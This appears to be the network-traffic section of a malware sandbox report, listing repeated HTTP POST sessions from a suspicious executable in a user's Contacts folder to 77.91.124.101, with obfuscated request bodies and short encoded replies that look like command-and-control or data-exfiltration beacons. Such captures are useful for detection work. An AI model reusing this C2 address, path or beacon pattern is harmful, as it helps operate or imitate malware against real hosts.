Nov 21, 2023 04:48:11.312056065 CET	432	OUT	Data Raw: 57 59 58 59 5b 59 5a 51 5d 57 55 57 55 59 57 50 50 5a 58 43 56 52 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYXY[YZQ]WUWUYWPPZXCVRWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)5<(%)U4;-4:=<0=&-2S&0.:X>,/_/>&G''^)
Nov 21, 2023 04:48:11.513534069 CET	433	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	77.91.124.101	80	192.168.2.5	49782	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:11.571331024 CET	434	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1380 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:11.769016981 CET	434	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:11.769237995 CET	436	OUT	Data Raw: 52 5c 5d 5c 5b 5e 5f 5a 5d 57 55 57 55 56 57 57 50 58 58 48 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\]\[^_Z]WUWUVWWPXXHVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*8>?+&=.') 5_+)$>:W'0-5<7\,&G''^)
Nov 21, 2023 04:48:11.971777916 CET	439	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:11 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 12 25 59 23 01 34 0a 33 55 28 03 2e 0b 2c 2e 07 19 28 33 25 5a 27 3d 3f 01 24 07 25 50 3c 01 3f 05 27 29 06 1d 37 36 33 00 3d 30 21 5a 0c 1d 25 03 22 2b 23 1f 3f 00 2c 5c 2b 13 37 04 31 1f 3b 59 3f 10 23 54 23 33 06 04 25 0a 38 56 2e 3c 3d 10 2e 01 35 1a 32 02 00 59 34 07 23 5f 0c 14 27 17 35 31 27 5b 20 0e 3e 1c 23 37 30 15 23 24 2f 53 27 5b 30 13 32 28 21 5f 3f 2b 3c 54 27 27 3b 09 24 39 37 1e 26 39 28 08 29 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "%Y#43U(.,.(3%Z'=?$%P<?')763=0!Z%"+#?,\+71;Y?#T#3%8V.<=.52Y4#_'51'[ >#70#$/S'[02(!_?+<T'';$97&9()&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.5	49782	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:11.571331024 CET	434	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1380 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:11.769016981 CET	434	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:11.769237995 CET	436	OUT	Data Raw: 52 5c 5d 5c 5b 5e 5f 5a 5d 57 55 57 55 56 57 57 50 58 58 48 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\]\[^_Z]WUWUVWWPXXHVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*8>?+&=.') 5_+)$>:W'0-5<7\,&G''^)
Nov 21, 2023 04:48:11.971777916 CET	439	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:11 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 12 25 59 23 01 34 0a 33 55 28 03 2e 0b 2c 2e 07 19 28 33 25 5a 27 3d 3f 01 24 07 25 50 3c 01 3f 05 27 29 06 1d 37 36 33 00 3d 30 21 5a 0c 1d 25 03 22 2b 23 1f 3f 00 2c 5c 2b 13 37 04 31 1f 3b 59 3f 10 23 54 23 33 06 04 25 0a 38 56 2e 3c 3d 10 2e 01 35 1a 32 02 00 59 34 07 23 5f 0c 14 27 17 35 31 27 5b 20 0e 3e 1c 23 37 30 15 23 24 2f 53 27 5b 30 13 32 28 21 5f 3f 2b 3c 54 27 27 3b 09 24 39 37 1e 26 39 28 08 29 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "%Y#43U(.,.(3%Z'=?$%P<?')763=0!Z%"+#?,\+71;Y?#T#3%8V.<=.52Y4#_'51'[ >#70#$/S'[02(!_?+<T'';$97&9()&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.5	49783	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:11.689568043 CET	434	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:11.885853052 CET	436	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:11.886046886 CET	438	OUT	Data Raw: 52 5a 58 51 5e 59 5a 5f 5d 57 55 57 55 5f 57 53 50 52 58 43 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXQ^YZ_]WUWU_WSPRXCVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)%_<:*#,72 >)3S'."R0295(?\,>&G''^)#
Nov 21, 2023 04:48:12.086941957 CET	439	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	77.91.124.101	80	192.168.2.5	49783	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:11.689568043 CET	434	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:11.885853052 CET	436	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:11.886046886 CET	438	OUT	Data Raw: 52 5a 58 51 5e 59 5a 5f 5d 57 55 57 55 5f 57 53 50 52 58 43 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXQ^YZ_]WUWU_WSPRXCVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)%_<:*#,72 >)3S'."R0295(?\,>&G''^)#
Nov 21, 2023 04:48:12.086941957 CET	439	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49719	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:31.019237995 CET	171	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:31.220777988 CET	171	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:31.221050024 CET	173	OUT	Data Raw: 52 58 58 51 5b 52 5a 58 5d 57 55 57 55 5a 57 55 50 5c 58 44 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXXQ[RZX]WUWUZWUP\XDVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)=_=(=? ?8'5 1?U*$.S&3>,(6($8.&G''^)7
Nov 21, 2023 04:47:31.425097942 CET	174	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	77.91.124.101	80	192.168.2.5	49719	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:31.019237995 CET	171	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:31.220777988 CET	171	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:31.221050024 CET	173	OUT	Data Raw: 52 58 58 51 5b 52 5a 58 5d 57 55 57 55 5a 57 55 50 5c 58 44 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXXQ[RZX]WUWUZWUP\XDVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)=_=(=? ?8'5 1?U*$.S&3>,(6($8.&G''^)7
Nov 21, 2023 04:47:31.425097942 CET	174	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.5	49784	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:12.409848928 CET	440	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:12.607481956 CET	440	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:12.607781887 CET	443	OUT	Data Raw: 57 5c 58 50 5b 52 5a 51 5d 57 55 57 55 5c 57 5a 50 53 58 41 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\XP[RZQ]WUWU\WZPSXAVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+.?.T?##,'5#1<%0["0!-%(<<,&G''^)/
Nov 21, 2023 04:48:12.810369015 CET	443	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	77.91.124.101	80	192.168.2.5	49784	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:12.409848928 CET	440	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:12.607481956 CET	440	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:12.607781887 CET	443	OUT	Data Raw: 57 5c 58 50 5b 52 5a 51 5d 57 55 57 55 5c 57 5a 50 53 58 41 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\XP[RZQ]WUWU\WZPSXAVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+.?.T?##,'5#1<%0["0!-%(<<,&G''^)/
Nov 21, 2023 04:48:12.810369015 CET	443	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.5	49785	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:13.128065109 CET	444	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:13.326134920 CET	444	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:13.326483011 CET	447	OUT	Data Raw: 57 5c 5d 5d 5e 5a 5f 59 5d 57 55 57 55 5a 57 51 50 5c 58 46 56 56 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\]]^Z_Y]WUWUZWQP\XFVVWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X=8)Y(+T #.72#>(#)0=' -+=+,&G''^)7
Nov 21, 2023 04:48:13.528403044 CET	447	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	77.91.124.101	80	192.168.2.5	49785	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:13.128065109 CET	444	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:13.326134920 CET	444	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:13.326483011 CET	447	OUT	Data Raw: 57 5c 5d 5d 5e 5a 5f 59 5d 57 55 57 55 5a 57 51 50 5c 58 46 56 56 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\]]^Z_Y]WUWUZWQP\XFVVWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X=8)Y(+T #.72#>(#)0=' -+=+,&G''^)7
Nov 21, 2023 04:48:13.528403044 CET	447	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.5	49786	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:13.848887920 CET	448	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:14.051969051 CET	450	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:14.052304029 CET	452	OUT	Data Raw: 52 5b 5d 5e 5e 58 5a 5e 5d 57 55 57 55 57 57 53 50 58 58 43 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]^^XZ^]WUWUWWSPXXCVQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+!X<(9*#7/B- :(#P3->R$2W:!<,88&G''^)
Nov 21, 2023 04:48:14.254933119 CET	461	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	77.91.124.101	80	192.168.2.5	49786	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:13.848887920 CET	448	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:14.051969051 CET	450	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:14.052304029 CET	452	OUT	Data Raw: 52 5b 5d 5e 5e 58 5a 5e 5d 57 55 57 55 57 57 53 50 58 58 43 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]^^XZ^]WUWUWWSPXXCVQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+!X<(9*#7/B- :(#P3->R$2W:!<,88&G''^)
Nov 21, 2023 04:48:14.254933119 CET	461	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	77.91.124.101	80	192.168.2.5	49788	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:14.724189043 CET	462	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:14.922880888 CET	462	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:14.923093081 CET	465	OUT	Data Raw: 57 5f 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 52 50 5e 58 45 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_XY[__Y]WUWU]WRP^XEVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^;-Z?;V=,2#)9_)0R0"W'9-8</&G''^)+
